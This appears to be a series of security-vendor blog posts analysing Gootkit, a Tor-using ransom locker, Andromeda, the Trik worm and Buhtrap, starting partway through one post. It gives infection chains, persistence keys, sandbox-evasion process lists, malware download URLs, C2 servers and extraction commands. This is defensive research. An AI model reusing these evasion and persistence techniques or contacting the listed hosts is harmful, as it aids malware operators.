• SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS
• SECURITY_FLAG_IGNORE_CERT_CN_INVALID
• SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
• SECURITY_FLAG_IGNORE_WRONG_USAGE
• SECURITY_FLAG_IGNORE_UNKNOWN_CA
• SECURITY_FLAG_IGNORE_REVOCATION

The downloaded data is saved into the registry as follows:

• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_0
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_1
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_2
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_3
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_4
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_5
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_6

As shown, the saved data is encrypted and does not result into an executable file.

The second thread is also responsible for querying the data in the registry. It decrypts the data using a custom XOR decryption and decompresses it using RtlDecompressBuffer.

After which, it sets an event which triggers the first thread to proceed with process injection. 

Third and Fourth Thread

The fourth thread is responsible for downloading a file from the same domains above. The exact url path is {Domain}/rpersists2/%d where %d is some random number. It also expects the downloaded file to be having “MZ” header.

The third thread saves the downloaded file in the %Windir% folder using random number filename such as 2144874235-50823412.exe. It will also create a registry entry to ensure its execution every after reboot such as:

• HKCU\Software\Microsoft\Windows NT\CurrenVersion\Winlogon\Shell            
  • Data: C:\Windows\2144874235-50823412.exe

File-less Gootkit

Gootkit malware was first discovered in 2014. It is a banking trojan which initially focused on French banks and later on expanded to European banks as reported last December by Proofpoint.

The version we were able to capture appears to be version 4 as seen in its code:

The file size is pretty large at 4.86MB. References to source code can also be seen in the sample such as:

• src_iedriver\CabFile.cc
• src_iedriver\CertGen.cc
• src_iedriver\node_xz.cpp
• src_iedriver\socket_watcher.cpp
• src_iedriver\SpywareJSWrappers.cc
• src_iedriver\sqlite\node_sqlite3.cc
• src_iedriver\Threading.cc
• src_iedriver\VideoRecorder.cc
• src_iedriver\VmDetection.cc
• src_iedriver\wincrypt.cc
• src_iedriver\WindowsRegistry.cc
• src_iedriver\ProtectedStorage.cc

This gives us an idea of the capabilities of this malware. For instance, SpywareJSWrappers is likely the spyware module. This module has some APIs used for stealing information such as SpAddPortRedirection, DownloadFileRight, SpHookHttp, SpTakeScreenshot, SpHookRecv, SpHookSend, SpInsertInjection, SpHookKeyboard , etc.  

Summary

We have seen in this infection how attackers try to hide their infection through fileless malware and SSL traffic. They also utilized Angler EK as means to deliver their payload with its ability to detect AV engines and encrypted binary download. In our recent blogs, we have shown how Angler uses Bedep to download additional malware such as POS malware. Bedep is known to be an ad-fraud malware with download capabilities. We have not seen Bedep to be installed in the file system as the usual case so in this case, it acted only as a downloader. In this infection, the goal is to install Gootkit, a very dangerous malware with Backdoor and Spyware capabilities while achieving stealth through fileless infection and encrypted network traffic. The Gootkit loader is detected by Cyphort as TROJAN_WALDEC.DC.

Cyphort Labs will continue to monitor this threat and will provide additional details as needed.

As of this writing, the site is now clean from infection. 

Hashes

136fe64689f3919e1ba46e384ca8bef7 – Gootkit Loader

Special thanks to Alex Burt, Abhijit Mohanta, Sandeep Mandhotra and rest of Cyphort Labs for the discovery and analysis of this infection.

The post Angler EK leads to fileless Gootkit appeared first on Cyphort.

On March 9 2016, Cyphort Labs discovered an infection on a porn site keng94(dot)com redirecting visitors to an exploit kit and installing a Ransom Locker. The site is redirecting users to rg(dot)foldersasap(dot)com which is a RIG EK landing page that serves a malicious flash file and a malicious binary.

Chain and RIG EK landing

The binary arrives encrypted over the network and after decryption, it is saved in the %temp% folder. The binary is  a new trojan-downloader type of malware but we found multiple references of the string “FA” in its code which gives us an idea on the specific name/family of the malware.

•  ItsMeFA
• “version_fa”
• fa 155 

It adds an autostart key in the registry and copies itself in the StartMenu folder to execute itself at every start-up. It creates the file “C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc“. This a tor configuration file which indicates how tor is being used.  The config file is set to start a “Tor Hidden Service” which can be accessed using port 1060. Tor is a free tool that is used for network anonymity.

torrc file contents

After creating the torrc file, it downloads a file from “http://myfiles(dot)pro/uploads/1275859359.Gaga.mp3” and saves it as C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe

This file is actually an executable file masquerading as an mp3. When started, it spawns the following process:

• C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe -f torrc

And as the usual tor execution process, the following files are created.

As a hidden service, tor automatically generates an onion address (e.g., 43zri2d6x2rruezl.onion) for your machine and it is written to a file named ‘hostname’. It uses this tor hidden service to download its final payload. The use of the tor hidden service allows the attacker to hide its malicious network activity in the tor network. A few moments later, the following window covers the entire screen making it unusable.

Since it locked our system, we thought of booting it in safe mode for further investigation but we were not able to do so. We decided to analyze it offline and we used volatility  to analyze the memory image.

Using Volatility to Find the Malware

We obtained the memory dump and process tree list using volatility command “pstree” and found the sd_app.exe to be the last process spawned which is also spawning another instance of tor.exe. This is likely the downloaded app and responsible for locking our screen.

To confirm this, we list visible windows using the “wintree” command  to identify which process is responsible for the lock screen and we identified the same sd_app.exe. 

Next, we identified the full path of the file using the process id and ‘cmdline‘ command

We dumped the disk and found the following list of files added.

The .bat  disables advanced boot options using bcedit which explains why we are not able to boot in safe mode.

contents of 1.bat

In-the-Wild Samples

Using VirusTotal service, we searched for similar samples and found 4 related samples. The first appearance of the sample is last February 01, 2016 with very low detection when first submitted. The files are also signed but the certificates are invalid. The resources section of the binary points to Russia or Ukraine. 

The variants of sd_app are also signed but 2 of the files still have no detection. 

We also found the files uploaded have debug prints in the code and files are uploaded from Ukraine which indicates that the actors are using VirusTotal to test if their malware is detected by heuristics. The first variant uploaded in VT has version 0.01a-154d as indicated by the ff string:

• WIN32-VS-x32-RELEASE-Feb  1 2016-15:33:48 v.0.01a-154d

The sample we got is version 0.02a-155. This clearly means it is in the early stage of development.

Conclusion

It’s been a while since we have seen a new family of Ransom Locker in-the-wild, probably due to the success of file-encrypting ransomware such as Cryptolocker, Cryptowall, Locky, etc. Also, Ransom Lockers can be easily cleaned by using “rescue discs”  so it was not effective for monetization. However, this new discovery is an advancement of ransom locker malware as it is using Tor to communicate to its CnC servers. By using tor, the attacker adds a layer of anonymity while doing its malicious activity. Also, while the attacker got your machine kidnapped, they created a Tor hidden service that allows the attacker to utilize your system for bitcoin payments or other malicious activity. As discovered by a researcher, there has been an spike of tor hidden services due to the ongoing spam campaign of Ransomware Locky. We also believe that the malware is in its early stages of development and the actors are testing the waters. 

Cyphort’s Advanced Threat Detection is able to detect the exploit infection and also detects all the payload files through behavioral detection.

Special thanks to Alex Burt and Cyphort Labs for their help in analysis and discovery of this malware.

IOCs

 Trojan Downloader hashes (FA)

5ed449fc2385896f8616e5cd7bee3f31

3a00058ccaee78805f539f2f6a259e92

d183ed4609e6ad7b00250c50a963db5d

6af38533fc8621128e943488a6f189ed

fb016a14ef1384ec78a284636631ab17

Screen Locker (SD)

29e71b864ac46bd3e2c216cce0403114

 639c62bcae61054a229ed3c79a109cc4

092b9e87bd75384df188feb2c4e402a2

e8231d2b7a04a5826a78b2908a1dd393

Mutex Names

ItsMeFA

ItsMeSD

The post New Family of Ransom Locker Found, Uses TOR Hidden Service appeared first on Cyphort.

On June 30, 2016, Cyphort Labs discovered an infection via malvertising on the website trendystyleshop.com. According to Domain Tools, the site was registered in February 2016 under namecheap.com. What draw our interest to this infection is that it installs TeamViewer, a popular remote application tool which is widely used in enterprises. It makes sense for cyber criminals to use it because it is a good way to masquerade backdoor access as it blends with other users using the same app. You probably recall that a month ago a major hack of TeamViewer accounts was reported on various news outlets.

Infection Chain

The affected ad network is “nanoadexchange.com”. It advertises a game from “uphillrush.pro” but the ad is injected with an iframe that redirects to “aga111.pro” then redirects to “jnqedq.lswswc.xyz” which is hosting a Flash exploit kit.

After successful exploitation, it downloads an Andromeda bot from the same domain. The binary arrives encrypted over the network. 

The bot is installed in the %APPDATA% folder and filename starting with ms*.exe. Example:

• %APPDATA%\msqgoj.exe

As a persistence method, it will spawn a new process of “msiexec.exe” and inject its code. However, it will not install itself if the following processes are found as part of its Anti-Sandbox and Anti-Analysis trick:

• avpui.exe
• filemon.exe
• netmon.exe  
• perl.exe
• prl_cc.exe
• prl_tools.exe
• prl_tools_service.exe
• procmon.exe
• python.exe
• regmon.exe  
• sandboxiedcomlaunch.exe
• sandboxierpcss.exe  
• sharedintapp.exe
• vboxservice.exe  
• vboxtray.exe  
• vmsrvc.exe  
• vmtoolsd.exe  
• vmusrvc.exe  
• vmwareservice.exe
• vmwareuser.exe  
• wireshark.exe

However, it ignores the process blacklisting check when the following registry key is present:

• HKLM \ SOFTWARE\Policies\is_not_vm

Andromeda has been around since 2011. It is a modular type of malware with the following known types:

• Keylogger
• Browser Form Grabber
• Hidden TeamViewer
• Rootkit

For this infection, we have seen it installing additional modules from vbbb.ru including Browser Form Grabber and Hidden TeamViewer. 

The above image shows the communication to the CnC server. Bmla.ru is encrypted via RC4 where the key is hardcoded in the malware body. Download domain is at vbbb.ru but both are with the same IP address, 93.170.187.47.

As part of its routine, Andromeda gets the current time via NTP (Network Time Protocol) domains. It connects to the following NTP domains:

• pool.ntp.org
• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Is Andromeda On the Rise Again?

Using the IP of the CnC 93.170.187.47, we gathered some domains resolved from it. We found that it is actively using the .ru TLD with 4 random letters as domain and usually having the last 3 letters the same. It also shows that this pattern has been active since April 10, 2016.

^{Source: virustotal.com}

We also discovered that one of the IPs used by Andromeda is actively used by Cerber ransomware, a ransomware infection used to encrypt  that . For instance, znnn.ru was registered with the following IP addresses sometime in May 2016.

It is unclear to us how the installation of TeamViewer is being exploited at this time by the actors behind this campaign, but it clearly is a major compromise that opens the door to a lot of possibilities. Cyphort Labs will continue to monitor and report any new developments.

IOCs

The post Infected Site Installs TeamViewer appeared first on Cyphort.

Over the past couple of months, Cyphort Labs identified a new version of Trik bot. Our in-the-wild Top Threats identification shows this bot to be one of the top in June and July. Trik is a worm which propagates through removable and network drives. It can also propagate by copying itself in web root folders, ftp folders or other folders that are accessible online. It is also a backdoor that communicates via IRC. Other names of this bot are Backdoor:Win32/Kirts or Worm:Porphiex. Cyphort Labs did a deep dive analysis of this malware.

Discovery

Trik is an old bot which was first seen in 2011. Its modus operandi is to use instant messaging systems to propagate. Over the past years, this bot appears to go quiet. From January to May 2016, we have only identified 84 variants of Trik. However starting from June to July 25, we identified 1,447 variants of the sample.

We discovered an early version of this bot on Virustotal which was seen on February 15, 2016. The sample with sha256 cdb6f46a56d97a962278960f4a58bbcd2270f27635f7c638884968ae44205931 timestamp is February 11, 2016. The sample is also packed with the compressed data in its resource section.

We unpacked this file and identified the name and version of this bot based on the reference of its .pdb file.

• C:\Users\x\Desktop\Home\Code\Trik v1.8\Release\Trik.pdb

Fast forward to July 2016, Trik uses a .NET packer/protector. Also the pdb file shows it is now in version 2.6. This  means that from 2011 until May 2016, we are only seeing version 1 updates of Trik but starting June, the actors are actively involved in the operations of Trik.

Aside from .NET protector, samples are now signed but from untrusted root CA.

The following analysis will now focus on the recent sample with sha256, 0b6258dc856fb84d11d368d3c8a4d6b3a379297ab08efa89b3f1a6ea5f556558

Packer

Similar to the first version, this .NET packer’s compressed data is in its resource section. It also has a loader which first checks for some sandbox and virtualization software before loading the payload.

The loader will first decrypt its configuration file in its resource section. The configuration is an array that defines the execution flow of the malware including mutex names. Based on the configuration, it can also delete the property of the file being downloaded from the internet by deleting this the alternate data stream “{filename}:Zone.Identifier”. This will bypass dialog window from browsers implying the file was downloaded from the internet. This is an indication that the attackers using drive-by-download as a means to install this bot.

Armoring

This variant also detects the following softwares which are popular sandbox, and network analysis tools:

• SandBoxie
• Fiddler
• Wireshark
• WPE

The configuration also identifies the process where it will inject its code. It may choose from either the following processes:

• vbc.exe
• RegAsm.exe
• AppLaunch.exee
• svchost.exe
• notepad.exe
• self

In our sample, it injects on itself by launching a suspended process and writes into it.

The code injected is located in the resource section and encrypted. The decryption is a combination of rolling XOR with the keys also defined in the configuration.

Main Payload

The unpacked code is not in .NET assembly format but in C++. The version of this bot is identfied on its pdb reference which is v2.6.

• C:\Users\s\Desktop\Home\Code\Trik v2.6\Release\Trik.pdb

Similar to earlier version, the unpacked code is straight-forward.

It will first employ its Anti analysis, Anti Sandbox and Anti Virtualization checks. If found, it will uninstall itself.

AntiVirtual

Blacklisted Processes

Blacklisted DLL

Blacklisted Window Names

Blacklisted File Name

Blacklisted File Path

Blacklisted User Names

“Tequilaboomboom” might be the preferred user name of the author used during development of the malware.

To check if it has already infected the system it looks for the mutex name  “t71. It also checks if it is running as:

• %windir%\M-50504502689047502405034500693020490\winmgr.exe

If not, it will create a copy of itself in the same path above. It also adds itself in the Authorized Application list in the Firewall Policy settings. Creates Autostarts and disables the Windefender service.

It will create four threads which is the main payload routine.

Worm Routine on Removable and Network Drives

This is not a typical worming routine where it will drop a copy of itself into target folders or drives. Instead, it will drop a script that will download a copy or most likely an updated version of “Trik”. This method is another evasion technique employed by the malware. Even if the version of the malware is already detected, those infected drives with the components of the worm will have a chance to evade the detection.

Trik will first check if the download urls are accessible by iterating a list of urls and trying to download the “.exe” in the temp folder.. For the sample we checked, the following are the download URL.

• http://124[.]158[.]10[.]82/t.exe
• http://125[.]212[.]217[.]30/t.exe
• http://220[.]181[.]87[.]80/t.exe
• http://125[.]212[.]217[.]33/t.exe
• http://210[.]211[.]116[.]246/t.exe
• http://host5050[.]ru/t.exe
• http://host5051[.]ru/t.exe
• http://ouefuguefhuwuhs[.]ru/t.exe
• http://uwgfusubwbusswf[.]ru/t.exe           

After successful verification, it proceeds on finding specific drives. It targets removable and remote drives except drive “a” or “b”.

Depending on the type of drive, it will drop the following files:

• Autorun.inf
• DeviceManager.bat
• Manager.bat (if target drive is network drive)
• Manager.js (if target drive is removable)
• .lnk (shortcut file to Manager.js or Manager.bat)

Autorun.inf will function as an autostart and simply opening the drive will execute the malware. It executes Manager.bat or Manajer.js which will then execute DeviceManager.bat. DeviceManager.bat will contain a powershell script that will download and execute a copy or an update of Trik as %temp%\winupd.exe. As an additional evasion technique, it adds random strings in between lines of the scripts. For example, contents of autorun.inf are as follows:

Without the randomizer, the script will only contain the following:

DeviceManager.bat executes a powershell script or launches bitsadmin.exe to download Trik. It contains the following: (We removed the random strings to show clearly how the script works)

Worm Routine on Fixed Drives

Aside from worming on removable or network drives, it will also propagates a copy of itself into specific folders in fixed drives. It targets folders related to web root folders, ftp folders, or other sharing folders. It specifically looks for the following sub strings in the folder:

If found, for every “.exe” file in that folder, it will replace it with a copy of itself. Likewise, for every “.zip” or “.rar” in that folder it will add a copy of itself as “README.txt.scr”.

Backdoor Routine

Trik is an IRC backdoor. The sample we analyzed connects to any of the following IRC servers all on port 5050:

• 125.212.217.30
• 220.181.87.80
• 124.158.10.82
• 125.212.217.33
• 210.211.116.246
• host5050.ru
• host5051.ru
• ouefuguefhuwuhs.ru
• uwgfusubwbusswf.ru
• oeuuguhwugfuuws.ru
• efugusgdugugg.ru
• wdoaefaeodegfe.ru
• foeaufguehuaee.ru
• efuegdugugg.ru
• wdoargsiheffea.ru
• fofhihihienfospf.ru
• fgazeeufueea.ru
• wgwuwgruwddhuw.ru

If one of the IRC servers is online, it will issue a NICK containing system info and USER command. The USER command contained fixed parameters which is always ‘x “” “x” :x’

The NICK message contains system information including windows version, keyboard layout info, and whether the user is admin or not.

If successful, it will now wait for specific commands. It specifically looks for strings “001”, “433”, and “332” in the message as a signal for command. Command 001 means it will ask the bot to join to a specific channel. Command 433 instructs the bot to send system information. Command 332 contains additional sub command. It can instruct the bot to:

• Remove itself from the system
• Send more system information
• Download and execute files

It also seeks specific countries by getting the geolocation of the infected user through http://api.wipmania.com/. It will only download from specific list of countries hardcoded in its body. The list contains only countries from Americas and European countries.

Cyphort detects Trik as TROJAN.KIRTS.CY

The post Trik: A Bot With A Lot Up Its Sleeve appeared first on Cyphort.

In our recent blog, we talked about the delivery of Buhtrap by using compromised website and a recent web exploit. On this blog, we will focus on the second stage payload and the state of Buhtrap operation.

The Buhtrap downloader employs checks before it will infect a system. First, the system must have banking processes or banking software running, mostly Russian. Or the system must have an indication that it is visiting any Russian banks defined on its list.

If the system meets any of the 2 requirements above, it will download and execute the next stage malicious payload, otherwise, it will download a benign sample.

Technical Analysis of Second Stage Payload

The 2nd stage payload is an NSIS compiled sample as seen on previous Buhtrap samples. This is one way Buhtrap is trying to evade AV detection by disguising as an installer. NSIS is an open source software widely used in installers. Recently, we are seeing a trend where ransomware are adapting this method as the case with Locky and Cerber.

The sample is also digitally signed with a valid digital certificate and also contains file properties and versions.

Installation

Inside the NSIS package is a 7zip password protected archive. This is where all its components are stored. With this, a command line 7zip tool is also included in the package to unzip the component files. The password is hardcoded on the NSIS script and the password is different from other Buhtrap samples we have seen. For this sample, the password is “p2DP9ENv5bK”. It also modifies the timestamp of the file using a custom file utility FileTouch.exe which is basically similar to the touch utility in Linux

Below are snippets of the NSIS script that we extracted:

We executed the file on our box but we found that it did not do anything. Inspecting the NSIS script reveals that it is checking if the system language is Russian via GetSystemDefaultLangID.

We hooked this API and forced the malware to think we are in a Russian system.

After-which, the following commands and processes were monitored:

^{attrib  -h -s -r “C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno”}

^{7za.exe  x -p2DP9ENv5bK install.dat dev2055.tmp -aoa}

^{7za.exe  x -p2DP9ENv5bK dev2055.tmp -aoa -o8992023.tmp}

^{7za.exe  x -p2DP9ENv5bK install.dat FileTouch.exe -aoa}

^{C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno\zerno.exe}

As shown above, the malware components are extracted into  “%AppData%\Microsoft\Zerno”. Then zerno.exe was executed. The Zerno folder has the following files:

From these files, only the files zerno.exe and msvcr71.dll are malicious. The other files are benign files which are part of Notepad++ software. This is an attempt to obscure its malicious behavior as it tries to pretend to be a legitimate Notepad++ installer. 

For persistence, it creates a shortcut link in the start-up folder that will launch zerno.exe at every startup.

What Does this Malware Do?

The main executable is zerno.exe and interestingly its only job is to launch the msvcr71.dll library which performs all the malicious behavior.

Msvcr71.dll

This is where all the malicious routines are compiled. This is a trojan-spyware which has the following functions:

• Keylogger
• Get System Info
• Read Smart Card Info
• Downloader

Keylogger

The keylogger thread creates an invisible window procedure and retrieves and handles the messages. It logs this information into “uninstall.log” located in %temp% folder. 

The following snapshot illustrates how it implemented the keylogger routine.

Smart Card Reader

One of its interesting payloads is to read smart card information. It lists available smart card readers and their status by using “WinSCard.dll” APIs:

It does not actually read what is in the smart card only determine their status. It logs all these information in “uninstall.log”

Downloader

It is also capable of downloading additional malware from its CnC server. Another interesting feature of this malware is that it is capable of diskless loading by checking on the response from the server. The first 2 bytes are checked, If the downloaded file starts with ‘MZ’ (0x5A4D), it writes the file into %temp% folder and executes it. If the response starts with “LD” (0x444c), it will only load the malware into the memory.

Diskless Loading

CnC server

It communicates with its CnC server “quotedb.info” via HTTP Post. All communication we observed is encrypted.

State of Buhtrap Operation

As stated in our previous blog, the IP of rozhlas.site is 50.7.86.243. We looked into the domain history of this IP and found some interesting information about the current state of Buhtrap.

From the history of the domains, it appears they have used this IP from May to September, 2016. But it’s very possible that they are still using the same IP for their operation. If we look into the details of each domain, we can find presence of multiple samples, although with different behavior, but appears related to Buhtrap operation. For instance, 5 samples that were downloaded from getadobe.org differ in behavior from the sample we described in this blog. Those samples are detected by Kaspersky as “Trojan.Win32.Karamanak”, which is also their detection for the sample in this blog.

As seen on the domains, they are also using domain names related to Chrome, Adobe or popular graphics software as a way to stay low.

Chromelabs.org

Using this domain the actors started using CVE-2016-0189 as their method of infection. In fact, they used the same binary exploits found in the github repository of offensive security. The following are the files downloaded in this domain:

• http://chromelabs.org/data/shell32/51d2a95ddc.dll
• http://chromelabs.org/a3b4x62.exe
• http://chromelabs.org/blog/dsfsdhdh.vbs
• http://chromelabs.org/news/dsfsdhdh.exe
• http://chromelabs.org/track/automate.js

Adobelabs.org

A similar NSIS compiled payload was downloaded on this domain.

• http://get.adobelabs.org/zx/winax/fp_setup.exe

Also, the following files appearing as installers connects to this domain

Getcanvas.org

The samples we have seen from getcanvas.org are the same samples we found on rozhlas.site

Conclusion

It appears based on this research that the actors are using patterns in their attack and they are as follows:

• Using digitally signed malware
• Using NSIS and hiding their components in a password protected archive
• Using domains that are similar to popular softwares, eg. adobe, chrome
• Constantly changing their CnC domain but using the same IP

It is also evident that the actors are still very active. They are clever enough not to infect systems that are not their target which allows them to stay under the radar for as long as possible. These Tactics Techniques and Procedures are the hallmark of Advanced Persistent Threats groups.

Analysis by Dhruval Gandhi & Paul Kimayong.

The post Buhtrap Malware: What Every Bank’s Security Team Needs To Know appeared first on Cyphort.